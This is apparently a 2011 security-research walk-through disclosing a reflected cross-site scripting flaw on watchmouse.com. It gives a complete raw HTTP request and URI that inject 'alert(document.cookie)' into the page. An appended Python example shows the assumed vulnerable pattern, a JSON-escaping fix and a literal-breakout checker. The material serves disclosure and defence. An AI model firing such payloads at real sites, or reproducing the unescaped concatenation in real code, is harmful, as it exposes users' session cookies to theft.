Hoyt LLC Research
Boston, MA US
Feb 26, 2011

Re: Walk Thru for PoC

Using a tool such as Burp Suite Pro, ZAPROXY or another HTTP tool that can issue a raw GET, send the following request:

GET /en/api/checkreferrer.phpa0d30'-alert(document.cookie)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef= HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1298770635.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165779128.1798479609.1298770635.1298770635.1298770635.1; __utmc=165779128; __utmb=165779128.1.10.1298770635

The application will respond with a standard alert window displaying the document.cookie.

The resultant URI is expressed as:

http://www.watchmouse.com/en/api/checkreferrer.phpa0d30'-alert(document.cookie)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243::0::::en&vserverRef=

Please also be advised that all PoC code and reports should be viewed as Vulnerability Execution Research and reviewed by a senior developer or security team. Hoyt LLC Research aids a site listed in the XSS DB free of charge.
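As an added illustration (not part of Hoyt LLC's report), the Python below shows the failure mode the probe string exposes and the fix a developer would apply: the part of the request path after checkreferrer.php appears to be echoed into a JavaScript string literal, and the single quote in the probe closes that literal early. The variable name `ref`, the concatenation pattern and the way checkreferrer.php builds its script are assumptions; only the probe path is taken from the request above.

```python
import json

# Probe path copied from the request in the walk-through (query string omitted).
PROBE_PATH = "/en/api/checkreferrer.phpa0d30'-alert(document.cookie)-'ef346e3dbf0"


def reflect_unsafe(path: str) -> str:
    """Assumed vulnerable pattern (hypothetical reconstruction): the request path
    is concatenated straight into a single-quoted JavaScript string literal."""
    return "var ref = '" + path + "';"


def reflect_safe(path: str) -> str:
    """Hardened form: emit the value as a JSON string literal, then escape the
    characters that still matter inside an inline <script> block."""
    literal = json.dumps(path)
    literal = (literal.replace("<", "\\u003c")
                      .replace(">", "\\u003e")
                      .replace("&", "\\u0026"))
    return "var ref = " + literal + ";"


def literal_is_intact(snippet: str) -> bool:
    """Check that after 'var ref = ' the statement is exactly one string literal
    (honouring backslash escapes) followed by ';' and nothing else.
    Returns False when the reflected value broke out of the literal."""
    prefix = "var ref = "
    if not snippet.startswith(prefix):
        return False
    body = snippet[len(prefix):]
    if not body or body[0] not in "'\"":
        return False
    quote = body[0]
    i = 1
    while i < len(body):
        ch = body[i]
        if ch == "\\":
            i += 2          # skip the escaped character
            continue
        if ch == quote:
            return body[i + 1:] == ";"   # anything beyond ';' is injected code
        i += 1
    return False            # unterminated literal


if __name__ == "__main__":
    print("unsafe intact:", literal_is_intact(reflect_unsafe(PROBE_PATH)))  # False
    print("safe intact:  ", literal_is_intact(reflect_safe(PROBE_PATH)))    # True
```

The same scanner can be pointed at a captured response to confirm whether a reflected value is still contained by its string literal after a fix is deployed.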